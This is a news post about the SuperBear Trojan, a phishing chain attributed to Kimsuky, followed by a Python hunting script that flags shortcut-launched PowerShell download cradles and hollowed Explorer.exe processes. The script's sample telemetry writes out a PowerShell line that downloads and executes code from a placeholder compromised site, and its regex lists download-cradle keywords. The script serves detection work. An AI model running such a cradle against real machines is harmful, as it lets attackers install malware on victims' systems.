Carding
Researchers suspected the Kimsuky hacker group of using the new SuperBear Trojan.
A new phishing attack allegedly targeting civil society groups in South Korea has led to the discovery of a new SuperBear remote access Trojan by researchers at Interlab.
Late last month, an unnamed South Korean civil rights activist received an email containing a malicious ".lnk" shortcut file. The sender was listed as one of the members of the same activist organization, so the victim did not suspect anything.
The malicious shortcut, when executed, launched a PowerShell script to load other malicious components from a hacked but legitimate WordPress website. The payload included a script and an AutoIt binary file that used the Process Hollowing technique to inject malicious code into the Explorer.exe process.
This whole chain of actions led to the installation of a previously unknown remote access malware called SuperBear on a compromised computer. Shortly after launch, it established communication with the attackers' remote C2 server to exfiltrate data, download additional libraries, and execute commands.
According to Interlab researchers, by default, the Trojan always collects data from the infected host and sends it to the management server. But if hackers find something particularly interesting and valuable in the victim's files, they can continue the attack in manual mode and extract even more useful data for themselves.
The malware was named SuperBear for a reason: researchers found this word in the code of the Trojan, which can, under certain conditions, name one of its DLL libraries in this way.
The attack is attributed to the North Korean hacker group Kimsuky because of its similarity to its previous malware campaigns.
Experts note that Kimsuky is known for its numerous operations of data theft from government, military and commercial organizations. The group is linked to the North Korean government and probably conducts operations in its interests.
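A defender-side hunt for the two-stage chain the post describes (shortcut-launched PowerShell pulling a payload from a web server, then an AutoIt interpreter starting a fresh Explorer.exe to hollow), as an added example that is neither the post's nor Interlab's code. It assumes Sysmon Event ID 1 style process-creation fields (Image, ParentImage, ParentProcessId, OriginalFileName, CommandLine); the paths, file names and URL in the sample events are constructed placeholders, not indicators from the report.

```python
import re

# Download-cradle fragments typical of a shortcut-launched PowerShell stage.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"net\.webclient|invoke-expression|\biex\b", re.I)
# Processes that legitimately start explorer.exe (logon, shell restart).
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events: list) -> list:
    """Return (ProcessId, reason) for events matching either stage of the chain."""
    by_pid = {e["ProcessId"]: e for e in events}  # lets us inspect the parent's PE name
    hits = []
    for e in events:
        img, parent = basename(e["Image"]), basename(e["ParentImage"])
        # Stage 1: .lnk opened in Explorer -> PowerShell fetching a remote payload.
        if (img in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe"
                and CRADLE.search(e["CommandLine"])):
            hits.append((e["ProcessId"], "shortcut-launched PowerShell download cradle"))
        # Stage 2: a fresh explorer.exe started by something other than the logon
        # chain; an AutoIt3 parent is the hollowing host described in the report.
        if img == "explorer.exe" and parent not in EXPLORER_PARENTS:
            reason = "explorer.exe spawned by unexpected parent " + parent
            p = by_pid.get(e["ParentProcessId"], {})
            if p.get("OriginalFileName", "").lower() == "autoit3.exe":
                reason += " (AutoIt3 interpreter: possible process hollowing)"
            hits.append((e["ProcessId"], reason))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
AU3 = r"C:\Users\u\AppData\Local\Temp\update.exe"  # renamed AutoIt interpreter (constructed)
SAMPLE = [  # constructed telemetry reproducing the chain from the post
    {"ProcessId": 100, "ParentProcessId": 90, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "OriginalFileName": "EXPLORER.EXE",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 101, "ParentProcessId": 100, "Image": PS, "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://compromised-wordpress.example/wp-content/s.txt')\""},
    {"ProcessId": 102, "ParentProcessId": 101, "Image": AU3, "OriginalFileName": "AutoIt3.exe",
     "ParentImage": PS, "CommandLine": "update.exe run.au3"},
    {"ProcessId": 103, "ParentProcessId": 102, "Image": r"C:\Windows\explorer.exe",
     "OriginalFileName": "EXPLORER.EXE", "ParentImage": AU3, "CommandLine": "explorer.exe"},
]
```

Running `hunt(SAMPLE)` flags pid 101 (the download cradle) and pid 103 (Explorer.exe started by the AutoIt interpreter), while the normal logon-time explorer.exe at pid 100 stays quiet.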